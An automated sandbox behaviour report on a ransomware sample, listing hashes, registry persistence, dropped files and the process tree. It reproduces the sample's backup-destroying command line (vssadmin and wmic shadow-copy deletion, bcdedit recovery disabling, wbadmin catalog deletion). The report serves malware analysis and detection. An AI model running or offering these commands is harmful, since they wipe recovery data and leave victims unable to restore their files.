Analysis
-
max time kernel
131s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
19/05/2025, 14:51
Static task
static1
Behavioral task
behavioral1
Sample
2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
Resource
win10v2004-20250502-en
Behavioral task
behavioral2
Sample
2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
Resource
win11-20250502-en
General
-
Target
2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
-
Size
197KB
-
MD5
b35a7c0c23349c34d7eaa11be87681b3
-
SHA1
265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8
-
SHA256
c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c
-
SHA512
67a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2
-
SSDEEP
3072:zQ7pevne/DLB5w20WLjF72xnEt44etrlV9Yl4cqnj:zQ7peve/DLB56gF72CW4etrlV9m4
Malware Config
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (67) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts discord.exe File opened for modification C:\Windows\System32\drivers\etc\hosts 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation discord.exe -
Executes dropped EXE 1 IoCs
pid Process 1148 discord.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" discord.exe -
Drops desktop.ini file(s) 20 IoCs
description ioc Process File created C:\Users\Admin\Music\desktop.ini discord.exe File created C:\Users\Admin\OneDrive\desktop.ini discord.exe File created C:\Users\Admin\3D Objects\desktop.ini 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe File created C:\Users\Admin\Desktop\desktop.ini 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe File created C:\Users\Admin\Desktop\desktop.ini discord.exe File created C:\Users\Admin\Downloads\desktop.ini discord.exe File created C:\Users\Admin\Pictures\desktop.ini discord.exe File created C:\Users\Admin\Pictures\desktop.ini 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe File created C:\Users\Admin\OneDrive\desktop.ini 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe File created C:\Users\Admin\Documents\desktop.ini discord.exe File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini discord.exe File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe File created C:\Users\Admin\Music\desktop.ini 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe File created C:\Users\Admin\Videos\desktop.ini discord.exe File created C:\Users\Admin\Videos\desktop.ini 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe File created C:\Users\Admin\3D Objects\desktop.ini discord.exe File created C:\Users\Admin\Downloads\desktop.ini 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe File created C:\Users\Admin\Documents\desktop.ini 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini discord.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\Ñ:\APEXGO.exe.exe cmd.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\imagexSIxnnbNiOVYwyIIHwotgPgRNKhzjW.jpg" discord.exe Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\imageJYnansNC=fMcPGKpJKetnruH=HVMRU.jpg" 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTEPAD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTEPAD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language discord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000_Classes\Local Settings 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe Key created \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000_Classes\Local Settings discord.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\Ñ:\APEXGO.exe.exe cmd.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 3292 NOTEPAD.EXE 4376 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1148 discord.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe Token: SeDebugPrivilege 1148 discord.exe Token: SeIncreaseQuotaPrivilege 4644 WMIC.exe Token: SeSecurityPrivilege 4644 WMIC.exe Token: SeTakeOwnershipPrivilege 4644 WMIC.exe Token: SeLoadDriverPrivilege 4644 WMIC.exe Token: SeSystemProfilePrivilege 4644 WMIC.exe Token: SeSystemtimePrivilege 4644 WMIC.exe Token: SeProfSingleProcessPrivilege 4644 WMIC.exe Token: SeIncBasePriorityPrivilege 4644 WMIC.exe Token: SeCreatePagefilePrivilege 4644 WMIC.exe Token: SeBackupPrivilege 4644 WMIC.exe Token: SeRestorePrivilege 4644 WMIC.exe Token: SeShutdownPrivilege 4644 WMIC.exe Token: SeDebugPrivilege 4644 WMIC.exe Token: SeSystemEnvironmentPrivilege 4644 WMIC.exe Token: SeRemoteShutdownPrivilege 4644 WMIC.exe Token: SeUndockPrivilege 4644 WMIC.exe Token: SeManageVolumePrivilege 4644 WMIC.exe Token: 33 4644 WMIC.exe Token: 34 4644 WMIC.exe Token: 35 4644 WMIC.exe Token: 36 4644 WMIC.exe Token: SeIncreaseQuotaPrivilege 4212 WMIC.exe Token: SeSecurityPrivilege 4212 WMIC.exe Token: SeTakeOwnershipPrivilege 4212 WMIC.exe Token: SeLoadDriverPrivilege 4212 WMIC.exe Token: SeSystemProfilePrivilege 4212 WMIC.exe Token: SeSystemtimePrivilege 4212 WMIC.exe Token: SeProfSingleProcessPrivilege 4212 WMIC.exe Token: SeIncBasePriorityPrivilege 4212 WMIC.exe Token: SeCreatePagefilePrivilege 4212 WMIC.exe Token: SeBackupPrivilege 4212 WMIC.exe Token: SeRestorePrivilege 4212 WMIC.exe Token: SeShutdownPrivilege 4212 WMIC.exe Token: SeDebugPrivilege 4212 WMIC.exe Token: SeSystemEnvironmentPrivilege 4212 WMIC.exe Token: SeRemoteShutdownPrivilege 4212 WMIC.exe Token: SeUndockPrivilege 4212 WMIC.exe Token: SeManageVolumePrivilege 4212 WMIC.exe Token: 33 4212 WMIC.exe Token: 34 4212 WMIC.exe Token: 35 4212 WMIC.exe Token: 36 4212 WMIC.exe Token: SeIncreaseQuotaPrivilege 4212 WMIC.exe Token: SeSecurityPrivilege 4212 WMIC.exe Token: SeTakeOwnershipPrivilege 4212 WMIC.exe Token: SeLoadDriverPrivilege 4212 WMIC.exe Token: SeSystemProfilePrivilege 4212 WMIC.exe Token: SeSystemtimePrivilege 4212 WMIC.exe Token: SeProfSingleProcessPrivilege 4212 WMIC.exe Token: SeIncBasePriorityPrivilege 4212 WMIC.exe Token: SeCreatePagefilePrivilege 4212 WMIC.exe Token: SeBackupPrivilege 4212 WMIC.exe Token: SeRestorePrivilege 4212 WMIC.exe Token: SeShutdownPrivilege 4212 WMIC.exe Token: SeDebugPrivilege 4212 WMIC.exe Token: SeSystemEnvironmentPrivilege 4212 WMIC.exe Token: SeRemoteShutdownPrivilege 4212 WMIC.exe Token: SeUndockPrivilege 4212 WMIC.exe Token: SeManageVolumePrivilege 4212 WMIC.exe Token: 33 4212 WMIC.exe Token: 34 4212 WMIC.exe Token: 35 4212 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 1148 discord.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 1148 discord.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1712 wrote to memory of 1148 1712 cmd.exe 93 PID 1712 wrote to memory of 1148 1712 cmd.exe 93 PID 1712 wrote to memory of 1148 1712 cmd.exe 93 PID 1148 wrote to memory of 3292 1148 discord.exe 96 PID 1148 wrote to memory of 3292 1148 discord.exe 96 PID 1148 wrote to memory of 3292 1148 discord.exe 96 PID 4160 wrote to memory of 4376 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 97 PID 4160 wrote to memory of 4376 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 97 PID 4160 wrote to memory of 4376 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 97 PID 4160 wrote to memory of 956 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 98 PID 4160 wrote to memory of 956 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 98 PID 4160 wrote to memory of 956 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 98 PID 1148 wrote to memory of 4372 1148 discord.exe 100 PID 1148 wrote to memory of 4372 1148 discord.exe 100 PID 1148 wrote to memory of 4372 1148 discord.exe 100 PID 4160 wrote to memory of 3080 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 102 PID 4160 wrote to memory of 3080 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 102 PID 4160 wrote to memory of 3080 4160 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe 102 PID 1148 wrote to memory of 5032 1148 discord.exe 103 PID 1148 wrote to memory of 5032 1148 discord.exe 103 PID 1148 wrote to memory of 5032 1148 discord.exe 103 PID 956 wrote to memory of 4644 956 cmd.exe 106 PID 956 wrote to memory of 4644 956 cmd.exe 106 PID 956 wrote to memory of 4644 956 cmd.exe 106 PID 4372 wrote to memory of 4212 4372 cmd.exe 107 PID 4372 wrote to memory of 4212 4372 cmd.exe 107 PID 4372 wrote to memory of 4212 4372 cmd.exe 107 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Adds Run key to start application
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt2⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:4376
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "2⤵
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:3080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\discord.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Local\discord.exeC:\Users\Admin\AppData\Local\discord.exe2⤵
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt3⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:3292
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "3⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5032
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:3568
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
197KB
MD5b35a7c0c23349c34d7eaa11be87681b3
SHA1265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8
SHA256c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c
SHA51267a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2
-
Filesize
40B
MD5ff1447561eae283bddeb71e3ea3168cb
SHA13399abb7e65489ccddc2118079c1ec2ce2f5404f
SHA256915cd36509e6360c2e35301430765ddc70a37057109c4806c7837452431d8b02
SHA5127e50186680e387a137c67f247201afe5809891050784a15ca510435e40947de6f3efb07db5e921bfda94a3e26927b2b833cdf4d1b66a3d7400d7fe3453aa7bad
-
Filesize
24KB
MD525342190bcc364d32b9e9f9928b5a8a5
SHA13ae3bdabaed70dba1fd96c0be72e17aa91c7802a
SHA256d626e482d44f5fc8eb1c9b2cd08070150ab99afe40cf6dc939015b01b09088f4
SHA512c0f4f1831f289d4d60e9323e36689c2e0aaa9a7de3dbe4e65b2974d26d3f6f480a7160f5eff2ad458f8b0a7f36057bfba9c7a1b62769091b02640176bd2e53c3
-
Filesize
1KB
MD52e8e30afd640ba60cee4644e27efecf2
SHA131f6a7727c6b40419715b769d6a60b3872868b5b
SHA256034c79570dc0d54160ed0d3b4435bf4fdcae10a0d2ab688348f112f399d6ea14
SHA512052401dbc296664301a8b0522296c3af22ddc1b36d3e782bcda2709b20aa47085cdf080bb536c34533c1d595768e21035112060f3672e3b82d5e23001c41f76b
-
Filesize
800B
MD5bdba72b1177bdfc5dee1d9941fdcae45
SHA1a7713959c8f0a6d8d7a6169665e87b009ac04b10
SHA256dd1e78ae51782f025cad303019e331c493d20bc0f7f71c0c186a85be24ee13be
SHA5123eca03cd090b483beb4e2009a535905ce6ac8100782f46dd681db1e2e25960cd854d303f2820225581b6e25a89925f0199fa022887a5c3c59f53297eb0884b5a
-
Filesize
95KB
MD523dcba6ae05640c3c9c1621cd9f4cd7f
SHA10b6ecd44bac5a58ba27dfdb26d9a8759723f1e3f
SHA256f7fc0500d8f3b0596e080a801561a86ce76670e85461c9a56537a011dbd595b0
SHA51211ac6c8fc9c45043757b7e0c2c9704c5ef75bd7b80794dbf0eea0a3c0d672164feb6e56d5685e4b8ef7c629394526794a9f32e0d093c6ffbfd7e3520002da18b
-
Filesize
3KB
MD5de941294418545204a4ec21837641098
SHA15b6c90046d37841e0096b1f85d021836f2b09639
SHA2561d7320e6895f426fe4f7bf535b0a63e8308202a6d1a7b790498c45ad5fc58cea
SHA512fcecb0fee780eda474576afb6fa799fadb5a82d1eb725f93bdcdc4bd7617361f254d03510cbb7f50b1f056e15dd51f56d4a5027e21b4d6289a5e283e0a6b0daf